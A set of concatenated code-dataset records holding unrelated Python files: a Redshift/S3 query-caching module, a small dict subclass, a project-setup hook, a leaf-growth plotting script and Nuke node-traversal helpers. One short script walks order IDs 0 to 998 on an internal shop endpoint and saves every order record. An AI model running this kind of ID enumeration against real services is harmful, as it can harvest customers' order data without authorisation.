params.generate_params_with_vals(\n\t\t\t\t\tdict(self._prepare_param_overrides(\n\t\t\t\t\t\tnon_filter_params,\n\t\t\t\t\t\tcurrent_non_filter_param_vals\n\t\t\t\t\t))\n\t\t\t\t)\n\t\t\t\tself._send_record_set_to_cache(\n\t\t\t\t\tcache_or_pipeline,\n\t\t\t\t\tcursor.as_of,\n\t\t\t\t\tcurrent_val_params,\n\t\t\t\t\trecord_set,\n\t\t\t\t)\n\t\t\t\tmetric_fields = {\n\t\t\t\t\t\"units\": atomic_data_units,\n\t\t\t\t}\n\t\t\t\tmetric_fields.update(\n\t\t\t\t\tcurrent_val_params.supplied_non_filters_dict\n\t\t\t\t)\n\t\t\t\tself.catalogue.metrics.influx_metric(\n\t\t\t\t\t\"redshift_data_units\",\n\t\t\t\t\tmetric_fields,\n\t\t\t\t\tquery_name=current_val_params.query_name,\n\t\t\t\t\t**current_val_params.supplied_filters_dict\n\t\t\t\t)\n\n\t\t\tif pipeline:\n\t\t\t\t# Commit any outstanding pipeline work (noop if nothing was set())\n\t\t\t\t# This will also release the connection if bound\n\t\t\t\tcache_or_pipeline.execute()\n\n\tdef _send_record_set_to_cache(self, cache, as_of, params, record_set):\n\t\tas_of_datetime = None\n\t\tif as_of:\n\t\t\tas_of_datetime = 
datetime.utcfromtimestamp(as_of).replace(tzinfo=pytz.utc)\n\n\t\tchart_series = self.to_chart_series(params, record_set)\n\t\ttry:\n\t\t\tself.validate_chart_series(chart_series, params.supplied_filters_dict)\n\t\texcept UserWarning as w:\n\t\t\tself.catalogue.metrics.influx_metric(\n\t\t\t\t\"redshift_query_warnings\",\n\t\t\t\t{\n\t\t\t\t\t\"message\": str(w),\n\t\t\t\t},\n\t\t\t\tquery_name=params.query_name,\n\t\t\t\t**params.supplied_filters_dict\n\t\t\t)\n\n\t\tif self.raw_series_data:\n\t\t\tresult = chart_series\n\t\telse:\n\t\t\tresult = {\n\t\t\t\t\"render_as\": self.display_visual.name.lower(),\n\t\t\t\t\"series\": chart_series,\n\t\t\t\t\"as_of\": as_of_datetime,\n\t\t\t}\n\n\t\tserialized_result = self.serialize_data_for_cache(result)\n\n\t\tcompressed_val = zlib.compress(serialized_result.encode(\"utf-8\"))\n\n\t\twith params.get_meta_context() as meta:\n\t\t\tmeta[\"as_of\"] = as_of\n\t\t\tmeta[\"is_stale\"] = False\n\t\t\tmeta[\"query_hash\"] = self.query_hash\n\n\t\tcache.set(params.cache_key, compressed_val, ex=self.cache_ttl_seconds)\n\n\tdef serialize_data_for_cache(self, data):\n\t\tif self.as_csv:\n\t\t\tcolumn_names = self.csv_column_names()\n\t\t\toutput = StringIO()\n\t\t\tcsvwriter = DictWriter(output, fieldnames=column_names)\n\t\t\tcsvwriter.writeheader()\n\t\t\tcsvwriter.writerows(data)\n\t\t\treturn output.getvalue()\n\t\telse:\n\t\t\treturn json.dumps(\n\t\t\t\tdata,\n\t\t\t\tcls=HSRedshiftJSONEncoder,\n\t\t\t\tseparators=(\",\", \":\"),\n\t\t\t)\n\n\tdef csv_column_names(self):\n\t\treturn [c.name for c in self.stmt.columns]\n\n\tdef csv_column_converters(self):\n\t\tresult = collections.OrderedDict()\n\t\tfor c in self.stmt.columns:\n\t\t\tresult[c.name] = c.type.python_type\n\t\treturn result\n\n\tdef to_chart_series(self, params, result_set):\n\t\treturn result_set\n\n\tdef validate_chart_series(self, chart_series, params={}):\n\t\t# This can be optionally implemented by subclasses to validate the output of\n\t\t# to_chart_series. 
UserWarnings will be caught and sent to Influx.\n\t\tpass\n\n\tdef example_parameters(self):\n\t\t# This should be implemented by subclasses\n\t\t# In order to use the LocalQueryRunner testing tool\n\t\tpass\n\n\tdef to_response_payload(self, result_set, params):\n\t\tchart_series_data = self.to_chart_series(params, result_set)\n\n\t\tresult = {\n\t\t\t\"render_as\": self.display_visual.name.lower(),\n\t\t\t\"series\": chart_series_data\n\t\t}\n\n\t\treturn result\n\n\t@classmethod\n\tdef local_query(cls, locals):\n\t\tfor loc in locals.values():\n\t\t\tif isclass(loc) and issubclass(loc, cls) and loc != cls:\n\t\t\t\treturn loc()\n\n\tdef to_executable_sql(self, args, engine=None, echo=True):\n\t\tif not engine:\n\t\t\tengine = get_engine_from_environ(echo=echo)\n\n\t\tparams = self.build_full_params(args)\n\t\tcompiled_statement = self.stmt.params(params.final_bind_params).compile(bind=engine)\n\t\tq = QueryStatementGenerator(engine, compiled_statement)\n\t\treturn q.query\n\n\tdef execute_with_args(self, args, engine=None, echo=True, as_table_rows=False, limit=None, print_duration=True):\n\t\tif not engine:\n\t\t\tengine = get_engine_from_environ(echo=echo)\n\n\t\tparams = self.build_full_params(args)\n\t\tif as_table_rows:\n\t\t\tstart = time.time()\n\t\t\tresult = self.as_result_set().execute(engine, params, as_json=False)\n\t\t\tend = time.time()\n\t\t\tduration = round(end - start, 2)\n\t\t\tif print_duration:\n\t\t\t\tprint(\"Duration Seconds: %s\" % duration)\n\t\t\tcolumn_formatters = self._create_column_formatters(result)\n\t\t\tcolumn_names = [column_formatters[c.name].format(c.name) for c in self.stmt.columns]\n\n\t\t\toutput = BytesIO()\n\t\t\tcsvwriter = DictWriter(output, fieldnames=column_names)\n\t\t\tcsvwriter.writeheader()\n\t\t\tif limit is not None:\n\t\t\t\tcount = 0\n\t\t\t\tfor row in result:\n\t\t\t\t\tif count >= limit:\n\t\t\t\t\t\tbreak\n\t\t\t\t\tformatter = lambda k, v: column_formatters[k].format(str(v))\n\t\t\t\t\tformatted_row = 
{formatter(k, k): formatter(k, v) for k, v in row.items()}\n\t\t\t\t\tcsvwriter.writerow(formatted_row)\n\t\t\t\t\tcount += 1\n\t\t\telse:\n\t\t\t\tfor row in result:\n\t\t\t\t\tformatter = lambda k, v: column_formatters[k].format(str(v))\n\t\t\t\t\tformatted_row = {formatter(k, k): formatter(k, v) for k, v in row.items()}\n\t\t\t\t\tcsvwriter.writerow(formatted_row)\n\t\t\treturn output.getvalue()\n\t\telse:\n\t\t\tstart = time.time()\n\t\t\tresult = self.execute(engine, params)\n\t\t\tend = time.time()\n\t\t\tduration = round(end - start, 2)\n\t\t\tif print_duration:\n\t\t\t\tprint(\"Duration Seconds: %s\" % duration)\n\t\t\treturn json.dumps(result)\n\n\tdef _create_column_formatters(self, results):\n\t\tcolumn_widths = collections.defaultdict(int)\n\t\tfor row in results:\n\t\t\tfor col, val in row.items():\n\t\t\t\tcolumn_widths[col] = max(column_widths[col], len(str(val)), len(str(col)))\n\n\t\treturn {k: \"{:>%is}\" % (v) for k, v in column_widths.items()}\n\n\nclass ResultSetRedshiftQueryExecutor:\n\tdef __init__(self, query):\n\t\tself._query = query\n\n\tdef execute(self, engine, params, wlm_queue=None, as_json=True):\n\t\tgroup = wlm_queue if wlm_queue else self._query.catalogue._wlm_queue\n\t\tconn = engine.connect()\n\t\tconn.execute(\"SET QUERY_GROUP TO '%s';\" % group)\n\t\tcompiled_statement = self._query.stmt.params(params.final_bind_params).compile(bind=conn)\n\n\t\tstart_time = time.time()\n\t\tresult = conn.execute(compiled_statement)\n\t\tend_time = time.time()\n\t\tduration = round(end_time - start_time, 2)\n\t\tlogger.debug(\"Query Runtime: %s\" % duration)\n\n\t\tif as_json:\n\t\t\treturn json.dumps(\n\t\t\t\t(dict(row.items()) for row in result),\n\t\t\t\tcls=HSRedshiftJSONEncoder,\n\t\t\t\tseparators=(\",\", \":\"),\n\t\t\t\titerable_as_array=True\n\t\t\t)\n\t\telse:\n\t\t\treturn [dict(row.items()) for row in result]\n\n\nclass PostgresQueryExecutor:\n\tdef __init__(self, query):\n\t\tself._query = query\n\t\tself.as_of = None\n\n\tdef 
execute(self, engine, params, cache, wlm_queue=None):\n\t\tconn = engine.connect()\n\t\tcompiled_statement = self._query.stmt.params(params.final_bind_params).compile(bind=conn)\n\t\tas_of = datetime.utcnow()\n\t\t# wrap the ResultProxy to return rows as dicts (like LazyRedshiftCursor)\n\t\tcursor = DictCursorProxy(conn.execute(compiled_statement))\n\t\tcursor.as_of = calendar.timegm(as_of.utctimetuple())\n\n\t\tself._query.update_cache(params, cursor, cache)\n\n\t\treturn cursor.as_of\n\n\nclass DictCursorProxy(object):\n\tdef __init__(self, cursor):\n\t\tself.cursor = cursor\n\t\tif not cursor.returns_rows:\n\t\t\traise ValueError(\"cursor must return rows\")\n\n\tdef __iter__(self):\n\t\treturn self\n\n\tdef __next__(self):\n\t\trow = self.cursor.fetchone()\n\t\tif row is None:\n\t\t\traise StopIteration()\n\t\treturn dict(row.items())\n\n\nclass RedshiftCursorQueryExecutor:\n\tdef __init__(self, query):\n\t\tself._query = query\n\t\tself.cursor_handle = \"%s_cursor_%s\" % (query.name, str(uuid4())[:7])\n\t\tself.as_of = None\n\n\tdef _make_final_stmt(self, engine, conn, params):\n\t\tcompiled_statement = self._query.stmt.params(params.final_bind_params).compile(bind=conn)\n\t\tq = QueryStatementGenerator(engine, compiled_statement)\n\t\treturn \"DECLARE %s CURSOR FOR %s\" % (self.cursor_handle, q.query)\n\n\tdef execute(self, engine, params, cache, wlm_queue=None):\n\t\tgroup = wlm_queue if wlm_queue else \"analytics\"\n\t\tconn = engine.connect()\n\t\tdeclare_statement = self._make_final_stmt(engine, conn, params)\n\n\t\tself.as_of = datetime.utcnow()\n\t\tconn.execute(\"SET QUERY_GROUP TO '%s';\" % group)\n\t\tconn.execute(\"BEGIN;\")\n\t\tconn.execute(str(declare_statement))\n\n\t\tcursor = LazyRedshiftCursor(self, conn, self._query.fetch_size)\n\t\tself._query.update_cache(params, cursor, cache)\n\n\t\tconn.execute(\"CLOSE %s;\" % self.cursor_handle)\n\t\tconn.execute(\"COMMIT;\")\n\t\tconn.close()\n\n\t\treturn cursor.as_of\n\n\nclass 
RedshiftAsyncQueryExecutor:\n\t\"\"\"Uses UNLOAD command to make query asynchronous.\"\"\"\n\n\tdef __init__(self, query):\n\t\tself._query = query\n\n\tdef _make_async_query_handle(self, params):\n\t\tnamespace = params.catalogue.s3_unload_namespace\n\t\treturn \"%s-unload-%s\" % (namespace, str(uuid4())[:7])\n\n\tdef execute(self, engine, params, cache, meta):\n\t\tas_of = calendar.timegm(datetime.utcnow().utctimetuple())\n\t\tunload_location = params.generate_unload_location(prefix=str(as_of))\n\t\tstmt = params.executable_unload_statement(prefix=str(as_of))\n\t\thandle = self._make_async_query_handle(params)\n\n\t\tlogger.info(\"Query handle for %s is %s\" % (params.unload_key, handle))\n\n\t\tredshift_pid = run_redshift_background_statement(stmt, handle, engine)\n\n\t\tmeta[\"in_flight\"] = True\n\t\tmeta[\"redshift_pid\"] = redshift_pid\n\t\tmeta[\"unload_location\"] = unload_location\n\t\tmeta[\"query_start\"] = as_of\n\t\tmeta[\"query_heartbeat\"] = as_of\n\t\tmeta[\"query_handle\"] = handle\n\n\t\treturn as_of\n\n\nclass LazyRedshiftCursor(object):\n\tdef __init__(self, executor, conn, fetch_size=1000):\n\t\tself._executor = executor\n\t\tself._cursor_handle = executor.cursor_handle\n\t\tself._conn = conn\n\t\tself._fetch_size = fetch_size\n\t\tself._buffer = []\n\n\t@property\n\tdef as_of(self):\n\t\treturn calendar.timegm(self._executor.as_of.utctimetuple())\n\n\tdef _fill_buffer(self):\n\t\tfetch_stmt = \"FETCH FORWARD %i FROM %s;\" % (self._fetch_size, self._cursor_handle)\n\t\tresult = self._conn.execute(fetch_stmt)\n\t\tself._buffer.extend([dict(row.items()) for row in result])\n\n\tdef __iter__(self):\n\t\treturn self\n\n\tdef __next__(self):\n\t\tif not self._buffer:\n\t\t\tself._fill_buffer()\n\n\t\tif self._buffer:\n\t\t\treturn self._buffer.pop(0)\n\t\telse:\n\t\t\traise StopIteration()\n\n\nclass LazyZippedStreamingBodyReader(object):\n\tdef __init__(self, streaming_body, name, is_gzipped=True):\n\t\tself.name = name\n\t\tself.is_gzipped = 
is_gzipped\n\t\tself.streaming_body = streaming_body\n\t\tif self.is_gzipped:\n\t\t\tself.data = self.streaming_gzip_decompress(streaming_body)\n\t\telse:\n\t\t\tself.data = self.read_in_chunks(streaming_body)\n\t\tself.started = False\n\t\tself._buffer = b\"\"\n\n\tdef read_in_chunks(self, streaming_body):\n\t\tfor chunk in iter(lambda: streaming_body.read(65536), b\"\"):\n\t\t\tyield chunk\n\n\tdef streaming_gzip_decompress(self, streaming_body):\n\t\t# offset 32 to skip the header\n\t\tdec = zlib.decompressobj(32 + zlib.MAX_WBITS)\n\t\tfor chunk in self.read_in_chunks(streaming_body):\n\t\t\trv = dec.decompress(chunk)\n\t\t\tif rv:\n\t\t\t\tyield rv\n\n\tdef __iter__(self):\n\t\treturn self\n\n\tdef __next__(self):\n\t\tif not self._buffer or self._buffer.find(b\"\\n\") == -1:\n\t\t\tif not self.started:\n\t\t\t\tlogger.info(\"Starting: %s\" % self.name)\n\t\t\t\tself.started = True\n\t\t\tself._buffer += next(self.data, b\"\")\n\n\t\tif self._buffer:\n\t\t\tline, partition, remainder = self._buffer.partition(b\"\\n\")\n\t\t\tself._buffer = remainder\n\t\t\treturn line.decode(\"utf8\")\n\t\telse:\n\t\t\traise StopIteration()\n\n\nclass ZippedStreamingBodyReader(object):\n\tdef __init__(self, streaming_body, name):\n\t\tself.name = name\n\t\tself.streaming_body = streaming_body\n\t\tself._lines = collections.deque([])\n\n\tdef __iter__(self):\n\t\tlogger.info(\"Starting: %s\" % self.name)\n\t\tdata = gzip.decompress(self.streaming_body.read())\n\t\ttext = data.decode(\"utf8\")\n\t\tself._lines.extend(text.split(\"\\n\"))\n\t\treturn self\n\n\tdef __next__(self):\n\t\trow = self._lines.popleft()\n\t\tif row:\n\t\t\treturn row\n\t\telse:\n\t\t\traise StopIteration()\n\n\nclass S3ManifestCursor(object):\n\tdef __init__(self, params, manifest_key, as_of, fetch_size=10000):\n\t\tself.params = params\n\t\tself.s3 = self.params.catalogue.s3\n\t\tself.as_of = as_of\n\t\tself.bucket = params.catalogue.s3_unload_bucket\n\t\tself.manifest_key = 
manifest_key\n\t\tmanifest_object = self.s3.get_object(\n\t\t\tBucket=self.bucket,\n\t\t\tKey=manifest_key\n\t\t)\n\t\tself.manifest = json.loads(manifest_object[\"Body\"].read().decode(\"utf8\"))\n\t\tself.readers = []\n\n\t\tcolumn_converters = params.query.csv_column_converters()\n\t\tself.converters = list(column_converters.values())\n\t\tself.column_keys = list(column_converters.keys())\n\t\tfor k, v in enumerate(self.converters):\n\t\t\tif issubclass(v, datetime):\n\t\t\t\tself.converters[k] = lambda v: \\\n\t\t\t\t\tdatetime.strptime(v, \"%Y-%m-%d %H:%M:%S\").replace(tzinfo=pytz.UTC)\n\t\t\telif issubclass(v, date):\n\t\t\t\tself.converters[k] = lambda v: datetime.strptime(v, \"%Y-%m-%d\").date()\n\n\t\tself.start_ts = int(time.time())\n\n\t\t# We are using the following logic so that we can stream through\n\t\t# The results on S3 using a fixed amount of memory.\n\t\tfor entry in self.manifest[\"entries\"]:\n\t\t\ttokens = entry[\"url\"].split(\"/\")\n\t\t\tkey = \"/\".join(tokens[-4:])\n\t\t\tentry_object = self.s3.get_object(\n\t\t\t\tBucket=self.bucket,\n\t\t\t\tKey=key\n\t\t\t)\n\t\t\tr = ZippedStreamingBodyReader(entry_object[\"Body\"], key)\n\t\t\tself.readers.append(r)\n\n\t\tself.dict_reader = reader(chain.from_iterable(self.readers))\n\n\t\tself._fetch_size = fetch_size\n\t\tself._buffer = collections.deque([])\n\t\tself._buffer_fill_count = 0\n\n\tdef _fill_buffer(self):\n\t\tself._buffer_fill_count += 1\n\t\tlogger.info(\"Buffer Fill %i\" % self._buffer_fill_count)\n\t\tlogger.info(\"Elapsed Seconds: %i\" % int(time.time() - self.start_ts))\n\t\tmem = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss\n\t\tlogger.info(\"Memory Usage: %s MB\" % str(round(mem / 1024, 2)))\n\n\t\treader = self.dict_reader\n\t\tnext_line = next(reader, None)\n\t\tcurrent_buffer_size = 0\n\t\ttarget_size = self._fetch_size - 1\n\t\twhile next_line and current_buffer_size < target_size:\n\t\t\tself._buffer.append(next_line)\n\t\t\tcurrent_buffer_size += 
1\n\t\t\tnext_line = next(reader, None)\n\n\t\tif next_line:\n\t\t\tself._buffer.append(next_line)\n\n\tdef __iter__(self):\n\t\treturn self\n\n\tdef _restore_types(self, next_result):\n\t\tresult = {}\n\t\tfor i, v in enumerate(next_result):\n\t\t\tk = self.column_keys[i]\n\t\t\tif v == \"_N_\":\n\t\t\t\tresult[k] = None\n\t\t\telse:\n\t\t\t\tresult[k] = self.converters[i](v)\n\n\t\treturn result\n\n\tdef __next__(self):\n\t\tif not self._buffer:\n\t\t\tself._fill_buffer()\n\n\t\tif self._buffer:\n\t\t\tnext_result = self._buffer.popleft()\n\t\t\t# Restore types so output is identical to sqlalchemy cursor\n\t\t\treturn self._restore_types(next_result)\n\t\telse:\n\t\t\traise StopIteration()\n","sub_path":"hsredshift/analytics/library/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":46571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"93270055","text":"class DistinctError(ValueError):\n \"\"\"如果向distinctdict添加重复值,则引发错误。\"\"\"\n\n\nclass distinctdict(dict):\n \"\"\"不接受重复值的字典\"\"\"\n\n def __setitem__(self, key, value):\n if value in self.values():\n if (\n (key in self and self[key] != value) or\n key not in self\n ):\n raise DistinctError(\"This value already exits for different key\")\n super().__setitem__(key, value)\n\n\nclass Folder(list):\n def __init__(self, name):\n self.name = name\n\n def dir(self, nesting=0):\n offset = \" \" * nesting\n print('%s%s/' % (offset, self.name))\n\n for element in self:\n if hasattr(element, 'dir'):\n element.dir(nesting + 1)\n else:\n print(\"%s %s\" % (offset, element))\n\n\n# 访问超类中的方法\nclass Mama:\n def says(self):\n print('do you homework')\n\n\nclass Sister(Mama):\n def says(self):\n Mama.says(self) # super().says()\n print('and clean you bedroom')\n","sub_path":"01.grammer/use_class.py","file_name":"use_class.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} 
+{"seq_id":"405201992","text":"from os import system\n\ngit = 'git init'\npoetry = 'poetry install'\n\n\ndef try_except(command, message):\n try:\n print(f\"+ {command}\")\n system(command)\n except Exception as e:\n print(f\"{message}: {e}\")\n\n\ntry_except(git, 'git exception')\ntry_except(poetry, 'poetry exception')\n","sub_path":"hooks/post_gen_project.py","file_name":"post_gen_project.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"502049364","text":"# Measuring leaf growth on newborn oak trees\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\n# Fonts:\ncsfont = {'fontname':'Charter', 'fontweight':'regular'}\nhfont = {'fontname':'Charter', 'fontweight':'bold'}\nifont = {'fontname':'Charter', 'fontweight':'regular', 'style':'italic'}\n\n# Colours:\nplant1Colour = '#18990c'\nplant2Colour = '#62b539'\nplant3Colour = '#93c75e'\n\nplant4Colour = '#67aeff'\nplant5Colour = '#3192ff'\nplant6Colour = '#0078ff'\n\ntextColour = '#818a8b'\n\ninterpColour = '#db2727'\n\nfont_axes = 12\nfont_labels = 22\nfont_title = 18\nfont_text = 14\n\n# Time:\nn_days = 21\ntime = range(1, n_days)\n\n# Leaf length in centimeters:\nl1p1e = np.array([4.4, 5.8, 6.8, 7.9, 8.7, 9.4, 9.6, 9.6, 9.6, 9.6, 9.6, 9.6, 9.6, 9.6, 9.6, 9.6, 9.6, 9.6, 9.6, 9.6])\nl1p2e = np.array([1.4, 2.1, 2.6, 3.6, 4.7, 6.0, 7.0, 8.1, 9.1, 9.8, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10])\nl2p2e = np.array([2.5, 3.0, 3.4, 3.8, 4.0, 4.1, 4.1, 4.1, 4.1, 4.1, 4.1, 4.1, 4.1, 4.1, 4.1, 4.1, 4.1, 4.1, 4.1, 4.1])\nl1p3e = np.array([3.8, 5.6, 6.7, 7.9, 9.1, 10.0, 10.3, 10.4, 10.4, 10.4, 10.4, 10.4, 10.4, 10.4, 10.4, 10.4, 10.4, 10.4, 10.4, 10.4])\n\nl1p1w = np.array([3.6, 4.2, 4.6, 5.2, 5.7, 6.0, 6.1, 6.1, 6.1, 6.1, 6.1, 6.1, 6.1, 6.1, 6.1, 6.1, 6.1, 6.1, 6.1, 6.1])\nl2p1w = np.array([2.0, 2.3, 2.7, 3.2, 4.0, 4.8, 5.0, 4.9, 6.0, 6.2, 6.3, 6.3, 6.4, 6.4, 6.4, 6.4, 6.4, 6.4, 6.4, 6.4])\nl3p1w = np.array([1.6, 1.8, 2.2, 
2.7, 3.2, 4.1, 4.3, 5.5, 5.4, 5.7, 6.0, 6.1, 6.1, 6.1, 6.1, 6.1, 6.1, 6.1, 6.1, 6.1])\n\nl1p2w = np.array([4.2, 4.9, 5.3, 6.0, 6.7, 7.6, 8.0, 8.4, 8.5, 8.6, 8.7, 8.8, 8.9, 9.0, 9.1, 9.1, 9.1, 9.1, 9.1, 9.1])\nl2p2w = np.array([2.2, 2.5, 2.8, 3.3, 4.0, 4.8, 5.2, 5.7, 6.0, 6.3, 6.7, 7.0, 7.3, 7.3, 7.4, 7.4, 7.4, 7.4, 7.4, 7.4])\n\nl1p3w = np.array([2.1, 2.5, 2.8, 3.1, 3.4, 3.5, 3.5, 3.5, 3.5, 3.5, 3.5, 3.5, 3.5, 3.5, 3.5, 3.5, 3.5, 3.5, 3.5, 3.5])\nl2p3w = np.array([2.6, 3.2, 3.7, 4.5, 5.3, 6.3, 6.5, 7.0, 7.2, 7.2, 7.3, 7.3, 7.3, 7.3, 7.3, 7.3, 7.3, 7.3, 7.3, 7.3])\nl3p3w = np.array([1.2, 1.5, 2.0, 2.4, 3.0, 4.2, 4.4, 5.3, 6.2, 6.7, 7.1, 7.4, 7.4, 7.4, 7.4, 7.4, 7.4, 7.4, 7.4, 7.4])\n\n# Mark the results that were interpolated (missing measurements):\ninterp_meas = np.array([8.5, 8.6, 8.7, 8.8])\ninterp_time = np.array([9, 10, 11, 12])\n\n# Collect results to find the largest growth:\ncollected = np.array([l1p1e, l1p2e, l2p2e, l1p3e, l1p2w, l2p2w])\nn_leafs, n_meas = np.shape(collected)\n\nlargest_growth = 0\n\nfor i in range(0, n_leafs):\n\n for j in range(0, n_meas-1):\n\n if j != 0:\n growth = collected[i][j] - collected[i][j-1]\n\n if growth > largest_growth:\n largest_growth = growth\n start_length = collected[i][j-1]\n end_length = collected[i][j]\n\nprint('Largest growth observed: ' + str(largest_growth) + ' from ' + str(start_length) + 'cm to ' + str(end_length) + 'cm in one day.')\n\n# Plot graph:\nfigure = plt.figure(figsize=(6, 7))\nfigureSubplot = figure.add_subplot(1,1,1)\nplt.plot(time, l1p1e, color=plant1Colour, linestyle='-', linewidth=2.0)\nplt.plot(time, l1p2e, color=plant2Colour, linestyle='-', linewidth=2.0)\nplt.plot(time, l2p2e, color=plant2Colour, linestyle='-', linewidth=2.0)\nplt.plot(time, l1p3e, color=plant3Colour, linestyle='-', linewidth=2.0)\n\nplt.plot(time, l1p1w, color=plant4Colour, linestyle='-', linewidth=2.0)\nplt.plot(time, l2p1w, color=plant4Colour, linestyle='-', linewidth=2.0)\nplt.plot(time, l3p1w, color=plant4Colour, 
linestyle='-', linewidth=2.0)\n\nplt.plot(time, l1p2w, color=plant5Colour, linestyle='-', linewidth=2.0, zorder=0)\nplt.plot(time, l2p2w, color=plant5Colour, linestyle='-', linewidth=2.0)\n\nplt.plot(time, l1p3w, color=plant6Colour, linestyle='-', linewidth=2.0)\nplt.plot(time, l2p3w, color=plant6Colour, linestyle='-', linewidth=2.0)\nplt.plot(time, l3p3w, color=plant6Colour, linestyle='-', linewidth=2.0)\n\nplt.scatter(interp_time, interp_meas, color=interpColour, s=5, linewidth=2.0, zorder=1)\n\nplt.title(r'Leaf growth on newborn oak trees', fontsize=font_title, **hfont, color=textColour)\nplt.xlabel(r'Day', fontsize=font_labels, **csfont, color=textColour)\nplt.ylabel(r'Length in cm', fontsize=font_labels, **csfont, color=textColour)\n#plt.text(12, 4.3, 'secondary branch', **ifont, fontsize=font_text, color=plant2Colour)\nplt.text(20, 1.2, 'East orientation', **csfont, fontsize=font_text, color=plant1Colour, horizontalalignment='right')\nplt.text(20, 0.6, 'West orientation', **csfont, fontsize=font_text, color=plant6Colour, horizontalalignment='right')\nplt.text(16, 8, 'Missing measurements,\\nresults interpolated', **csfont, fontsize=font_text-6, color=interpColour, horizontalalignment='right')\nplt.xlim([0, time[-1] + 1]), plt.xticks(time)\nplt.ylim([0, 10]), plt.yticks(range(1, 12))\n\nfigureSubplot.spines['bottom'].set_color(textColour)\nfigureSubplot.spines['top'].set_color(textColour)\nfigureSubplot.spines['left'].set_color(textColour)\nfigureSubplot.spines['right'].set_color(textColour)\nfigureSubplot.tick_params(axis='x', colors=textColour)\nfigureSubplot.tick_params(axis='y', colors=textColour)\n\n# Set the tick labels font\nfor label in (figureSubplot.get_xticklabels()):\n label.set_fontname('Charter')\n label.set_fontweight('regular')\n label.set_fontsize(font_axes)\n\nfor label in (figureSubplot.get_yticklabels()):\n label.set_fontname('Charter')\n label.set_fontweight('regular')\n label.set_fontsize(font_axes)\n\n# Save plot:\nfilename = 
'measuring-leaf-growth.png'\nplt.savefig(filename, dpi = 300, bbox_inches='tight')\n","sub_path":"measuring-leaf-growth/measuring-leaf-growth.py","file_name":"measuring-leaf-growth.py","file_ext":"py","file_size_in_byte":5470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"163889466","text":"import os\nfrom urllib.request import urlopen\nimport json\n\nfor i in range(999):\n html = 'http://www.eshop.unicom.local/eshop/front/order/orderInfo.do?id=' + str(i)\n response = urlopen(html).read()\n text = json.loads(response)\n print(i)\n name = './order/' + str(i) + '.txt'\n fopen = open(name, 'a')\n fopen.write(str(text))\n fopen.close()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"113880803","text":"# -------------------------------------------------------------------------- #\n# ---------------------------------------------------------------- HEADER -- #\n\"\"\"\n@copyright: 2018 Kludgeworks LLC\n\n@description: tools related to hierarchical relationships between nodes\n\n@author: Ed Whetstone\n\n@applications: NUKE\n\"\"\"\n\n# -------------------------------------------------------------------------- #\n# --------------------------------------------------------------- IMPORTS -- #\n# internal\nfrom vfx_utils.plutonium.core import decorators\n\n# domain\nimport nuke\n\n# -------------------------------------------------------------------------- #\n# ------------------------------------------------------------ DECORATORS -- #\ndef main_tree(func):\n \"\"\"decorates functions which take node arguments representing the\n main comp tree. 
Replaces nodes=None with a list of nuke Nodes.\"\"\"\n return decorators.defaults_factory('nodes', (main_comp, [], {}), func)\n\ndef full_tree(func):\n \"\"\"decorates functions which require all nodes connected to main\n tree, including those that don't contribute to the image, or are\n connected via expression links. Replaces nodes=None with a list\n of nuke Nodes.\"\"\"\n return decorators.defaults_factory('nodes', (full_comp, [], {}), func)\n\n# -------------------------------------------------------------------------- #\n# ------------------------------------------------------------- FUNCTIONS -- #\n\n# ------------------------------------------------ Input / Output Helpers -- #\n@decorators.selected_node\ndef direct_outputs(node=None, pipe=None):\n \"\"\"returns a list of nodes that node outputs to directly\n (not via expressions)\n \"\"\"\n depend_nodes = node.dependent(nuke.INPUTS)\n if not pipe:\n return [n for n in depend_nodes if n.Class() != 'Viewer']\n else:\n return [n for n in depend_nodes if n.Class() != 'Viewer'\n and n.input(pipe) == node]\n\n@decorators.selected_node\ndef direct_inputs(node=None):\n \"\"\"returns a list of nodes output to node directly\n (not via expressions)\"\"\"\n depend_nodes = node.dependencies(nuke.INPUTS)\n return [d for d in depend_nodes if d.Class() != 'Viewer']\n\n@decorators.selected_node\ndef exp_outputs(node=None):\n \"\"\"returns a list of nodes that node outputs through expressions\"\"\"\n depend_nodes = node.dependent(nuke.EXPRESSIONS)\n return [d for d in depend_nodes if d.Class() != 'Viewer']\n\n@decorators.selected_node\ndef exp_inputs(node=None):\n \"\"\"returns a list of nodes that this node recieves information from\n through expressions\"\"\"\n depend_nodes = node.dependencies(nuke.EXPRESSIONS)\n return depend_nodes\n\n# --------------------------------------------------------- Above / Below -- #\n@decorators.selected_nodes\ndef up(nodes=None, pipe=None):\n \"\"\"returns a list of nodes one level up from 
the given node(s)\"\"\"\n try:\n list(nodes)\n except:\n nodes = [nodes]\n if not pipe:\n return [in_node for n in nodes for in_node in direct_inputs(n)]\n else:\n return [n.input(pipe) for n in nodes if n.input(pipe)]\n\n@decorators.selected_nodes\ndef down(nodes=None, pipe=None):\n \"\"\"returns a list of nodes one level down from the given node(s)\"\"\"\n try:\n list(nodes)\n except:\n nodes = [nodes]\n return [out_node for n in list(nodes)\n for out_node in list(direct_outputs(n, pipe=pipe))]\n\n@decorators.selected_nodes\ndef above(nodes=None, dist_return=False, pipe=None):\n \"\"\"returns a list of all nodes that are up-chain from the\n given node(s)\"\"\"\n try:\n list(nodes)\n except TypeError:\n nodes = [nodes]\n above_nodes = []\n distances = []\n dist = 0\n while len(nodes) > 0:\n new_nodes = up(nodes, pipe=pipe)\n dist += 1\n new = filter(lambda a: a not in above_nodes, new_nodes)\n if len(new) == 0:\n break\n for n in new:\n if n not in above_nodes:\n above_nodes.append(n)\n distances.append(dist)\n nodes = new\n if dist_return:\n above_nodes = zip(above_nodes, distances)\n return above_nodes\n\n@decorators.selected_nodes\ndef below(nodes=None, dist_return=False, pipe=None):\n \"\"\"returns a list of all nodes that are up-chain from the\n given node(s)\"\"\"\n try:\n list(nodes)\n except:\n nodes = 